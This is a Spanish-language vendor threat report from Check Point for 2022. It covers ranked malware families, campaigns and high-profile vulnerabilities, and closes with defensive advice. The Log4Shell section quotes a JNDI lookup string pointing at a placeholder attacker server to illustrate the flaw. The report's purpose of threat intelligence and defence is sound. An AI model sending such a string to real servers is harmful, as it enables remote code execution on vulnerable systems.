13%

9%

9%

38%

8%7%

Formbook AgentTesla Raccoon LokiBot Vidar NanoCore Other

Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot Other

39%

42%

7%

18%

12%

10%

8%6%

14%

13%

9%

8% 7%7%

Formbook AgentTesla LokiBot Raccoon Vidar Snake Keylogger Other

Formbook AgentTesla LokiBot Vidar NanoCore Raccoon Other

7%

18%

16%

11% 8%7%

33%

16%

13%

9%

9%

38%

8%7%

Formbook AgentTesla Raccoon LokiBot Vidar NanoCore Other

Formbook Raccoon AgentTesla Vidar RedLine Stealer LokiBot Other

39%

42%

7%

PRINCIPALES MALWARE DE INTERCEPTACIÓN

C A P Í T U L O 5

47CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 47CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

ANÁLISIS GLOBAL DE LOS MALWARE DE INTERCEPTACIÓN El panorama de interceptación todavía domina muchas familias imperceptibles de malware. AgentTesla, un interceptor prominente de información de consumo que se descubrió por primera vez en 2014, demostró una reducción considerable en importancia comparado con 2020, con una caída del 50%. LokiBot, un interceptor de información de consumo que surgió en 2016, experimentó una reducción similar.

El mejor de la lista es Formbook, un malware interceptor de información de consumo vendido como servicio en los foros ilegales desde 2016. El malware está diseñado para recopilar información mediante el registro de las pulsaciones de teclas. A mediados de 2021, una nueva variante de Formbook se detectó en la red. La variante se distribuyó en una campaña de suplantación de identidad (phishing) que aprovechó los documentos de PowerPoint como adjuntos de correo electrónico para la entrega del malware.

Otro malware como servicio que ingresó en nuestras estadísticas top de malware por primera vez es Raccoon. Este interceptor, vendido en la Dark Web durante al menos dos años, ofrece una plataforma bien mantenida para sus afiliados con funciones de reparación rápida de errores y actualizaciones automatizadas para su carga útil, como así también malware instalado en las máquinas de las víctimas.

Las actualizaciones recientes de Raccoon incluyen la capacidad de robar criptomonedas, instalar más malware y propagarse mediante la optimización de motores de búsqueda de Google en vez de en correos electrónicos de suplantación de identidad (phishing). La campaña actual intenta atraer a sus víctimas al ofrecerles licencias de software vulneradas.

C A P Í T U L O 5

https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/ https://threatpost.com/raccoon-stealer-google-seo/168301/

48CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 48CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Figura 22: Principales malware de criptominería a nivel global

Figura 24: Principales malware de criptominería en EMEA

GLOBAL

Figura 23: Principales malware de criptominería en América

Figura 25: Principales malware de criptominería en APAC

AMÉRICA

EUROPA, ORIENTE MEDIO Y ÁFRICA (EMEA) ASIA-PACÍFICO (APAC)

50%

12%

7%

41%

5%5%4%3%

43%

8%6%

XMRig LemonDuck RubyMiner DarkGate Kinsing Other

XMRig LemonDuck WannaMine NRSMiner RubyMiner Other

2%

6%

43%

15%

13%

8%

15%

4%

XMRig LemonDuck RubyMiner WannaMine NRSMiner Other

XMRig RubyMiner LemonDuck DarkGate Kinsing Other

27%

42%

6%

33%

2% 50%

12%

7%

41%

5%5%4%3%

43%

8%6%

XMRig LemonDuck RubyMiner DarkGate Kinsing Other

XMRig LemonDuck WannaMine NRSMiner RubyMiner Other

2%

6%

43%

15%

13%

8%

15%

4%

XMRig LemonDuck RubyMiner WannaMine NRSMiner Other

XMRig RubyMiner LemonDuck DarkGate Kinsing Other

27%

42%

6%

33%

2% 50%

12%

7%

41%

5%5%4%3%

43%

8%6%

XMRig LemonDuck RubyMiner DarkGate Kinsing Other

XMRig LemonDuck WannaMine NRSMiner RubyMiner Other

2%

6%

43%

15%

13%

8%

15%

4%

XMRig LemonDuck RubyMiner WannaMine NRSMiner Other

XMRig RubyMiner LemonDuck DarkGate Kinsing Other

27%

42%

6%

33%

2%

50%

12%

7%

41%

5%5%4%3%

43%

8%6%

XMRig LemonDuck RubyMiner DarkGate Kinsing Other

XMRig LemonDuck WannaMine NRSMiner RubyMiner Other

2%

6%

43%

15%

13%

8%

15%

4%

XMRig LemonDuck RubyMiner WannaMine NRSMiner Other

XMRig RubyMiner LemonDuck DarkGate Kinsing Other

27%

42%

6%

33%

2%

PRINCIPALES MALWARE DE CRIPTOMINERÍA

C A P Í T U L O 5

49CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 49CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

ANÁLISIS GLOBAL DE CRIPTOMINEROS XMRig, una herramienta de criptominería legítima que fue aprovechada por los agentes de amenaza para fines maliciosos, no solo continúa en la cima de la clasificación de criptominero sino que, también, aumentó su popularidad en más del 25% en comparación con 2020. Dos familias de malware ingresaron a la clasificación de criptomineros por primera vez este año: LemonDuck, que ya es el segundo para XMRig y CryptoBot.

LemonDuck, que demostró un crecimiento de más del 50 % en la tasa de ataque en comparación con las estadísticas de mitad de año, es un botnet de criptominería de autopropagación que presenta capacidades de robo de credenciales, evasión de detección y movimiento lateral. LemonDuck también funciona como un descargador de malware y, a menudo, se observa instalando el troyano Ramnit.

CryptoBot es un criptominero avanzado que recopila la billetera de la víctima y la información de cuenta tras la infección. En Diciembre, se observó a CryptoBot en una campaña orientada a usuarios con una copia pirateada del sistema operativo Windows. La campaña aprovecha una herramienta de activación designada denominada KMSPico que engaña a Windows Key Management Services (KMS) al autenticar una copia pirateada de Windows como legítima. Cuando un usuario descarga una versión afectada de la herramienta, CryptoBot se instala de manera silenciosa usando los procesos de segundo plano. Similar a LemonDuck, CyptoBot se detectó anteriormente al utilizar la vulnerabilidad de EternalBlue como parte de su cadena de infección.

C A P Í T U L O 5

https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/ https://www.moneycontrol.com/news/technology/hackers-target-windows-pirates-with-cryptobot-malware-7806771.html https://redcanary.com/blog/kmspico-cryptbot/ https://www.izoologic.com/2020/02/01/cryptobot-derived-from-famous-malwares-attacking-asian-countries/

50CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 50CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Figura 26: Troyanos bancarios más frecuentes a nivel global

Figura 28: Troyanos bancarios más frecuentes en EMEA

GLOBAL

Figura 27: Troyanos bancarios más frecuentes en América

Figura 29: Troyanos bancarios más frecuentes en APAC

AMÉRICA

EUROPA, ORIENTE MEDIO Y ÁFRICA (EMEA) ASIA-PACÍFICO (APAC)

36%

11% 11%

9%

5%

26%

19%

13% 8%

7%

5%

30%

14%

12%

21%

TrickBot Qbot Dridex IcedID Ursnif Ramnit Other

TrickBot Ramnit Dridex Ursnif Qbot IcedID Other

7%

8%

31%

16% 11%

10%

7%

21%

8%

TrickBot Qbot Dridex Ursnif Ramnit IcedID Other

TrickBot Dridex Qbot Ursnif IcedID Zloader Other

21%

22%

4%

7% 36%

11% 11%

9%

5%

26%

19%

13% 8%

7%

5%

30%

14%

12%

21%

TrickBot Qbot Dridex IcedID Ursnif Ramnit Other

TrickBot Ramnit Dridex Ursnif Qbot IcedID Other

7%

8%

31%

16% 11%

10%

7%

21%

8%

TrickBot Qbot Dridex Ursnif Ramnit IcedID Other

TrickBot Dridex Qbot Ursnif IcedID Zloader Other

21%

22%

4%

7%

36%

11% 11%

9%

5%

26%

19%

13% 8%

7%

5%

30%

14%

12%

21%

TrickBot Qbot Dridex IcedID Ursnif Ramnit Other

TrickBot Ramnit Dridex Ursnif Qbot IcedID Other

7%

8%

31%

16% 11%

10%

7%

21%

8%

TrickBot Qbot Dridex Ursnif Ramnit IcedID Other

TrickBot Dridex Qbot Ursnif IcedID Zloader Other

21%

22%

4%

7%

36%

11% 11%

9%

5%

26%

19%

13% 8%

7%

5%

30%

14%

12%

21%

TrickBot Qbot Dridex IcedID Ursnif Ramnit Other

TrickBot Ramnit Dridex Ursnif Qbot IcedID Other

7%

8%

31%

16% 11%

10%

7%

21%

8%

TrickBot Qbot Dridex Ursnif Ramnit IcedID Other

TrickBot Dridex Qbot Ursnif IcedID Zloader Other

21%

22%

4%

7%

TOP BANKING TROJANS PRINCIPALES TROYANOS BANCARIOS

C A P Í T U L O 5

51CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 51CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

ANÁLISIS GLOBAL DE TROYANOS BANCARIOS El panorama de malware bancario continúa siendo dominado por una colección de familias de malware furtiva, adaptable durante los últimos años recientes. TrickBot trepó al segundo lugar hasta la cima de la clasificación mundial, mientras que Dridex cayó del primer al tercer puesto y está inactivo en casi un 60% en comparación con 2020.

Qbot es un malware bancario en constante evolución diseñado inicialmente para recopilar las credenciales bancarias y las pulsaciones de teclas. Presenta capacidades de gusano pero funciona también como botnet, a menudo usado en campañas de ransomware para instalar malware en los dispositivos infectados. En Septiembre, Qbot reanudó sus operaciones después de un descanso de tres meses, ejecutando una campaña de spam a gran escala que aprovechó el malware como botnet e interceptor, y distribuyó el cargador de malware ‘SquirrelWaffle’. La campaña reciente se basó en macros de Visual Basic y Excel 4.0. En Noviembre, se observó la etapa de monetización de la campaña, a medida que el instalador de malware comenzó a instalarse en el ransomware Conti.

Dridex, otro malware bancario que ahora presenta capacidades de interceptor y botnet, mostró una disminución significativa este año. Sin embargo, en Septiembre los investigadores detectaron una nueva variante de Dridex, con capacidades de recopilación ampliada, que se propagaba en una campaña de suplantación de identidad (phishing) con documentos de Excel especialmente elaborados. Además, en Diciembre, Dridex estuvo entre el primer malware en ser distribuido en una campaña que aprovecha la vulnerabilidad Log4j para provocar una infección.

C A P Í T U L O 5

https://cisomag.eccouncil.org/qbot-malware-attack/ https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document https://www.bleepingcomputer.com/news/security/log4j-vulnerability-now-used-to-install-dridex-banking-malware/

52CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 52CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Figura 30: Principales malware móviles a nivel global

Figura 32: Principales malware móviles en EMEA

GLOBAL

Figura 31: Principales malware móviles en América

Figura 33: Principales malware móviles en APAC

AMÉRICA

EUROPA, ORIENTE MEDIO Y ÁFRICA (EMEA) ASIA-PACÍFICO (APAC)

26%

11%10%

14%

39%

29%

17% 13%

7%

Hiddad xHelper AlienBot FluBot Other

Hiddad xHelper AlienBot FluBot Other

44%

18%

16%

20%

Hiddad xHelper AlienBot FluBot Other

2%34%

xHelper Hiddad AlienBot FluBot Other

30%

16% 11%

3%

40%26%

11%10%

14%

39%

29%

17% 13%

7%

Hiddad xHelper AlienBot FluBot Other

Hiddad xHelper AlienBot FluBot Other

44%

18%

16%

20%

Hiddad xHelper AlienBot FluBot Other

2%34%

xHelper Hiddad AlienBot FluBot Other

30%

16% 11%

3%

40%

26%

11%10%

14%

39%

29%

17% 13%

7%

Hiddad xHelper AlienBot FluBot Other

Hiddad xHelper AlienBot FluBot Other

44%

18%

16%

20%

Hiddad xHelper AlienBot FluBot Other

2%34%

xHelper Hiddad AlienBot FluBot Other

30%

16% 11%

3%

40%

26%

11%10%

14%

39%

29%

17% 13%

7%

Hiddad xHelper AlienBot FluBot Other

Hiddad xHelper AlienBot FluBot Other

44%

18%

16%

20%

Hiddad xHelper AlienBot FluBot Other

2%34%

xHelper Hiddad AlienBot FluBot Other

30%

16% 11%

3%

40%

PRINCIPALES MALWARE MÓVILES

C A P Í T U L O 5

53CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 53CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

ANÁLISIS GLOBAL DE MALWARE MÓVILES Hiddad, un malware de Android malware diseñado para mostrar anuncios, anteriormente aprovechó el tema de la COVID-19 y mantuvo su lugar entre los mejores de la clasificación, junto con xHelper, con quien comparte el gráfico circular de malware en un 25% menos en comparación con 2020. Este año, otras dos familias de malware ingresaron en la clasificación por primera vez, seguidas de dos familias nuevas de malware: AlienBot y FluBot.

AlienBot es un malware bancario de Android distribuido por agentes de amenaza como malware como servicio. El malware permite que el atacante inyecte, de manera remota, un código arbitrario en las aplicaciones financieras legítimas y, por lo tanto, obtenga acceso a las cuentas financieras de las víctimas y, eventualmente, controle por completo su dispositivo. En Marzo, Check Point Research detectó un nuevo instalador denominado ‘Clast82’ distribuido mediante Google Play Store que instala AlienBot en las máquinas de las víctimas. El instalador utiliza una cantidad de técnicas para evitar la detección mediante Google Play Protect. Por ejemplo, las cargas útiles no maliciosas se instalaron durante el período de evaluación y, después de este, se cambiaron a un AlienBot.

FluBot, otro malware bancario de Android, surgió a fines de 2020, dirigiéndose a los usuarios europeos y propagándose mediante SMS enviado desde dispositivos infectados. Las campañas de FluBot se basan en los temas creativos; una campaña que se dirigió a los usuarios finlandeses en Junio y Noviembre aprovechó un tema de correo de voz, preguntando a sus víctimas desde el enlace del operador móvil para escuchar los mensajes. Irónicamente, una campaña destinada a los usuarios de Nueva Zelanda presenta una advertencia de actualización de seguridad falsa a las víctimas de las infecciones de FluBot.

C A P Í T U L O 5

https://research.checkpoint.com/2020/covid-19-goes-mobile-coronavirus-malicious-applications-discovered/ https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/ https://threatpost.com/flubot-malware-targets-androids-with-fake-security-updates/175276/ https://threatpost.com/flubot-malware-targets-androids-with-fake-security-updates/175276/ https://www.bleepingcomputer.com/news/security/finland-warns-of-flubot-malware-heavily-targeting-android-users/ https://www.bleepingcomputer.com/news/security/flubot-android-malware-now-spreads-via-fake-security-updates/

54CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 54CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

C A P Í T U L O 6

VULNERABILIDADES GLOBALES DE ALTO PERFIL

06

MUCHAS VULNERABILIDADES DESCUBIERTAS EN 2017 MANTUVIERON UNA FUERTE PRESENCIA A LO LARGO DEL 2021, ECLIPSANDO A LAS NUEVAS DESCUBIERTAS

55CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 55CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

La siguiente lista de las principales vulnerabilidades se basa en los datos recopilados por la red del sensor del Intrusion Prevention System (IPS) de Check Point y detalla algunos de los aprovechamientos de vulnerabilidades y las técnicas de ataque más populares e interesantes que detectaron los investigadores de Check Point en 2021.

‘LOG4SHELL’ APACHE LOG4J - EJECUCIÓN REMOTA DE CÓDIGO (CVE-2021-44228) Apache Log4j es un paquete de registro basado en Java con fuente abierta provista por la Apache Software Foundation, como parte de Apache Logging Services. Es la biblioteca de registro más conocida de Java, usada por millones de aplicaciones basadas en Java, en todo el mundo, para registrar actividades como operaciones de rutina del sistema y mensajes de error, y enviar diagnósticos a los administradores del sistema. El 9 de Diciembre, la Apache Foundation lanzó una versión de emergencia de Log4j para abordar una falla crítica en el marco de registro de datos. Esta falla permite que los agentes de amenaza comprometan una máquina al enviar una simple cadena como ‘${jndi:ldap://attacker_server/path}’ que forma parte de la solicitud de HTTP, el agente de usuario o cualquier otra entrada probable de ser usada por el servidor con Log4j. Al controlar los mensajes registrados mediante el paquete de registro, el código arbitrario podría ser ejecutado desde un servidor remoto. Denominada ‘Log4Shell’, la vulnerabilidad tomó a la comunidad de seguridad por sorpresa debido a sus efectos de largo alcance en millones de compañías, incluidas Cisco, Twitter, Cloudflare, Tesla, Amazon y Apple, que usan Log4j. La vulnerabilidad de amplia propagación de la falla se observó casi inmediatamente, tanto por los atacantes con pocas habilidades que distribuían criptomineros, como así también por los grupos de APT patrocinados por el estado, para obtener acceso a las redes corporativas. Según Check Point Research, aproximadamente el 48,3% de las organizaciones se vieron

afectadas por los intentos de explotación de vulnerabilidad de Log4Shell en 2021.

C A P Í T U L O 6

https://logging.apache.org/log4j/2.x/index.html https://logging.apache.org/log4j/2.x/security.html https://research.checkpoint.com/2021/the-laconic-log4shell-faq/ https://www.wired.com/story/log4j-log4shell/ https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/ https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

56CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 56CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

OMISIÓN DE AUTENTICACIÓN DE “PROXYLOGON” EN MICROSOFT EXCHANGE SERVER (CVE-2021-26855) ProxyLogon es el nombre dado por los investigadores de DEVCORE a una vulnerabilidad de omisión de autenticación (CVE-2021-26855) que descubrieron e informaron por primera vez a fines de 2020. Cuando se conecta con otras vulnerabilidades (CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), esta cadena de infecciones puede conducir a la ejecución remota de código en cualquier Exchange Server convencional sin parches. ProxyLogon ha sido aprovechada en la red por numerosos grupos de APT. En Agosto, Earth Baku lanzó una campaña en la región Indo-Pacífica usando una inyección de SQL y aprovechando ProxyLogon como vectores de entrada. En Septiembre, el grupo de ciberespionaje FamousSparrow aprovechó la falla como así también la puerta trasera SparrowDoor en las cadenas hoteleras, gobiernos, empresas privadas y otros numerosos sectores alrededor del mundo. Otro grupo de amenaza, SquirrelWaffle, fue visto hackeando los servidores de Microsoft Exchange con ProxyShell y

ProxyLogon para propagar malware a través de correos electrónicos maliciosos.

ATLASSIAN CONFLUENCE - EJECUCIÓN REMOTA DE CÓDIGO (CVE-2021-26084) Esta ejecución remota de código en el servidor de Atlassian Confluence Server o la falla en el Confluence Data Center, se hizo pública en Agosto de 2021, se derivó del Object Graph Navigation Language. Se puede vulnerar sin autenticación, permitiendo que un atacante remoto ejecute un código arbitrario en el sistema afectado.Atlassian lanzó parches para las empresas afectadas y muchas vulneraciones de prueba de concepto fuero publicadas. Los agentes de amenaza, por consiguiente, examinaron en búsqueda de vulnerabilidad con el intento de instalar criptomineros. En Septiembre, el criptosecuestrador z0Miner intentó realizar operaciones de minado en las máquinas vulnerables. En Octubre, se observó al operador de ransomware Atom Silo aprovechando computadoras sin

parches lanzar ataques de ransomware.

C A P Í T U L O 6

https://proxylogon.com/ https://gbhackers.com/earth-baku-apt-hackers/ https://www.darkreading.com/threat-intelligence/famoussparrow-apt-group-flocks-to-hotels-governments-businesses https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html https://cyberintelmag.com/cloud-security/atlassian-confluence-flaw-actively-exploited-to-install-cryptominers/ https://www.zdnet.com/article/this-cryptocurrency-miner-is-exploiting-the-new-confluence-remote-code-execution-bug/ https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/

57CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 57CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Figura 34: Porcentaje de ataques que aprovechan las vulnerabilidades por año de divulgación en 2021.

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

Earlier

0 5 10 15 20

2%

11%

5%

12%

17%

7%

8%

10%

6%

8%

3%

11%

Muchas vulnerabilidades descubiertas en 2017 mantuvieron una fuerte presencia a lo largo del 2021. Esto se debe mayormente a las fallas conocidas como la ejecución remota de código (CVE-2017-5638) de Apache Struts 2, que se incorporó al botnet Mirai o la ejecución remota de código (CVE-2017-9841) de PHPUnit, a menudo usada para aprovechar complementos vulnerables de WordPress.

Las vulnerabilidades de 2020 permanecieron prominentes, promediando un 11% de los ataques. Entre las más importantes estuvieron las vulnerabilidades de sobrecarga de búfer de la serie Draytek Vigor (CVE-2020-10826, CVE-2020- 10827, CVE-2020-10828), que tenía un 41% de acción de impacto global en las organizaciones. Estas vulnerabilidades podrían aprovecharse para ejecutar código arbitrario en los enrutadores Draytek vulnerables, usando una solicitud de HTTP remota diseñada especialmente.

C A P Í T U L O 6

https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ https://isc.sans.edu/diary/28084

58CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 58CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

Figura 35: Porcentaje de ataques que aprovechan las vulnerabilidades por año de divulgación por mes.

JA N

21 FE

B 2 1

MA R 2

1

AP R 2

1

MA Y 2

1

JU N

21 JU

L 2 1

AU G 2

1 SE

P 2 1

OC T 2

1

NO V 2

1

DE C 2

1

100%

90%

80%

70%

60%

50%

40%

30%

20%

10%

0%

2021 2020 2019 2018 2017 2016 2015 2014 2013 2012 2011 Older

En 2021, observamos una adaptación más lenta de las vulnerabilidades

en comparación con los años anteriores. Esta organización revela que las

vulnerabilidades de 2021 fueron aprovechándose cada vez más por los hackers a

mediados de año, correspondiendo con una leve disminución en el uso de los CVE

desde 2017.

59CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

POR JONY FISCHBEIN CISO para Check Point Software

C A P Í T U L O 7

PREVENCIÓN DE LA PRÓXIMA PANDEMIA CIBERNÉTICA: UNA ESTRATEGIA PARA ALCANZAR UNA MEJOR SEGURIDAD

07

60CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 60CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

PREVENCIÓN DE AMENAZAS: EVITAR ATAQUES ANTES DE QUE SUCEDAN Uno de los mayores desafíos que enfrentan los profesionales de la seguridad son los ataques de la generación V: la combinación de una amplia gama de amenazas, ataques a gran escala y una amplia superficie de ataque. Una verdadera protección integral requiere un enfoque diseñado que evite los ataques antes de que ocurran. En definitiva, el objetivo es derrotar todos los ataques en todos los vectores posibles. Una arquitectura de seguridad que permite y facilita una infraestructura de protección unificada y uniforme proporcionará una protección más integral y veloz que una infraestructura compuesta de piezas que no funcionan en conjunto. Así, Check Point Infinity ofrece, principalmente, una arquitectura de seguridad que previene los ataques antes de que ocurran.

CUANDO SU PERÍMETRO ESTÁ EN TODOS LADOS Y LOS ATAQUES CONTINÚAN AVANZANDO, SU NEGOCIO NECESITA PREVENCIÓN PRECISA CON INTELIGENCIA ANTE AMENAZAS EN TIEMPO REAL El clima actual de megaataques en las cadenas de suministro y la constante lucha frente a nuevos malware evolucionados son vitales la inteligencia ante amenazas y la rápida capacidad de respuesta. Para mantener las operaciones comerciales en ejecución durante 2022, es necesario tener una inteligencia completa que elimine proactivamente las amenazas, una gestión de servicios de seguridad para controlar su red y capacidades de respuesta ante incidentes para responder rápidamente y resolver ataques. Debido a la constante evolución de malware, la mayoría de las empresas deben considerar implementar inteligencia sobre amenazas, que es una herramienta esencial. Cuando una organización tiene activos financieros, personales, intelectuales o nacionales a mantener y asegurar, un enfoque más integral en seguridad es la única forma efectiva de protegerse frente a los atacantes actuales y una de las más efectivas soluciones de seguridad proactiva disponibles, actualmente, es la inteligencia contra amenazas. La inteligencia sobre amenazas debe abarcar todas las superficies de ataques, incluidos los dispositivos móviles, la nube, la red, los puntos de conexión y el IoT, ya que estos vectores son comunes en todas las empresas. La inteligencia contra amenazas no es solo datos, es práctica. Y debería estimular el avance hacia un enfoque preventivo en primer lugar, bloqueando los ataques antes de que penetren, obteniendo la mejor tasa de captura conocida y amenazas desconocidas, y alcanzando una tasa de falso positivo cercana a cero, generando la mínima interrupción posible entre los usuarios.

C A P Í T U L O 7

61CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 61CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

ASEGURE TODO, YA QUE TODO PUEDE SER UN OBJETIVO POTENCIAL Para lograr una cobertura exitosa, las organizaciones deben buscar una solución única que pueda cubrir todos los vectores y las superficies de ataque. En un entorno multihíbrido, donde el perímetro ahora está en todos lados, la seguridad debería ser capaz de proteger todo.

El correo electrónico, el historial web, los servidores y el almacenamiento son solo el comienzo. Las aplicaciones móviles, la nube y el almacenamiento externo son esenciales y también lo es el cumplimiento con los dispositivos móviles conectados y los puntos de conexión y su creciente estado de dispositivo de la IoT. Las cargas de trabajo, los contenedores y las aplicaciones sin servidor en entornos multinube e híbridos deberían también ser parte de la lista de comprobación siempre. Con el rápido cambio a la nube y el trabajo híbrido, se está volviendo cada vez más importante tener una estrategia de prevención robusta ante fallos.

APROVECHAMIENTO DE LA ARQUITECTURA COMPLETA UNIFICADA La visibilidad integral en el estado completo de su red, obtenido mediante la consolidación, ahora es esencial cuando se trata de resguardarse ante ataques cada vez más sofisticados.

Muchas compañías intentan construir su seguridad usando un retazo de productos de único objetivo desde múltiples proveedores pero, a menudo, fallan y son dejados con brechas de seguridad ocasionadas por tecnologías inconexas. Este enfoque también produce una gran sobrecarga debido a que se basa en el trabajo con múltiples sistemas y proveedores en vez de una solución integral. Para alcanzar una seguridad inclusiva completa, las compañías deben, por lo tanto, adoptar una enfoque unificado multicapas que proteja todos los elementos de TI, incluidas las redes, los puntos de conexión, la nube y la IoT, todo compartiendo la misma arquitectura de prevención y siendo alimentados por los mismos datos de inteligencia contra amenazas en tiempo real.

C A P Í T U L O 7

62CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 62CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

∙ Educar a los empleados para reconocer amenazas potenciales: La educación del usuario ha sido siempre un elemento clave para evitar las infecciones de malware. Los aspectos básicos de conocer de dónde provienen los archivos, por qué un empleado los está recibiendo y si pueden confiar o no en el emisor continúan siendo herramientas útiles que sus empleados deberían usar antes de abrir archivos y correos electrónicos. Los métodos más comunes de infección usados en las campañas de ransomware todavía son el spam y suplantación de identidad (phishing) mediante correo electrónico. Con bastante frecuencia, la concientización del usuario puede prevenir un ataque antes de que ocurra. Dedique un tiempo a educar a sus usuarios y asegúrese de que si ven algo inusual, lo informen a sus

equipos de seguridad inmediatamente.

MANTENER LA LIMPIEZA DE LA SEGURIDAD ∙ Implementación de parches: Sucede muy

a menudo que los ataques son capaces de penetrar las defensas y aprovecharse de las vulnerabilidades conocidas, para las cuales existen parches que todavía no se han aplicado. Las organizaciones deben asegurarse de que los parches de seguridad se mantengan actualizados en todos los sistemas y software.

∙ Segmentación: Las redes deben estar segmentadas y, para contener infecciones y que no se propaguen en toda la red, deben aplicarse medidas de protección de firewall e

IPS entre los segmentos de la red.

TASA DE INFECCIONES Tasa de infección de virus (Ro) (fuente: OMS) Cantidad promedio de personas que contagia alguien infectado con un virus: Gripe: 1,3; SARS: 2-4, Corona: 2,5; Ébola: 1,6-2; Zika: 2-6,6; Sarampión: 11-18

PREVENCIÓN DE INFECCIONES Mejor tratamiento: Vacunación Mejores prácticas para lidiar con la infección: 1) Cuarentena, refugio en el lugar 2) Aislamiento 3) Rastreo de contactos

MEJORES PRÁCTICAS DE SEGURIDAD Tratamiento común (hasta la vacunación): 1) Barbijo 2) Higiene 3) Distanciamiento social

PANDEMIA BIOLÓGICA

TASA DE INFECCIONES Tasa de infección de malware (Ro). Cantidad promedio de hosts que infecta un host con malware: Ciberataque: >27 (fuente: WEF, NSTU) Slammer: Duplicación de tamaño cada 8,5 segundos Code Red: 2000 nuevos hosts por minuto

PREVENCIÓN DE INFECCIONES Mejor tratamiento: Prevención en tiempo real Mejores prácticas: Proceso continuo de: 1) Cuarentena: Sandboxing, microsegmentación 2) Aislamiento: Confianza cero, segregación 3) Seguimiento: Inteligencia sobre amenazas, IA, SOC, gestión de la postura

MEJORES PRÁCTICAS DE SEGURIDAD 1) Concientización: Piense antes de hacer clic… 2) Higiene cibernética: Parches, cumplimiento… 3) Distanciamiento de activos: Segmentación de redes, autenticación multifactor…

PANDEMIA CIBERNÉTICA

PANDEMIA BIOLÓGICA FRENTE A PANDEMIA CIBERNÉ TICA Similitudes y paralelismo, lecciones aprendidas

C A P Í T U L O 7

63CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022 63CHECK POINT SOF T WARE | INFORME SOBRE SEGURIDAD 2022

contenido y muchos más. Cada una de estas tecnologías pueden ser altamente efectivas en escenarios específicos, cubriendo los tipos específicos de archivo o los vectores de ataque. Las soluciones fuertes integran un amplio rango de tecnologías e innovaciones para combatir de manera efectiva los ataques modernos en los entorno de TI. Además de las tradicionales, las protecciones basados en la firma como los antivirus y las IPS, las organizaciones necesitan incorporar capas adicionales para prevenirse frente a nuevos y desconocidos malware aún sin firma. Dos componentes clave para considerar son la extracción de amenazas (limpieza de archivo) y la emulación de amenazas (espacio seguro avanzado). Cada elemento ofrece protección diferente que, cuando se usa de manera conjunta, ofrece una solución integral para la protección frente al malware desconocido a nivel de red y directamente en los dispositivos del punto de conexión.

∙ Revisión: Las políticas de los productos de seguridad deben revisarse con cuidado y los registros de incidentes deben controlarse de forma continua.

∙ Auditoría: Deben llevarse a cabo pruebas de entrada y auditorías de rutina en todos los sistemas.

∙ Principio de privilegio mínimo: Los privilegios de usuario y software deben mantenerse al mínimo. ¿Es realmente necesario que todos los usuarios tengan derechos de administrador local en sus equipos?

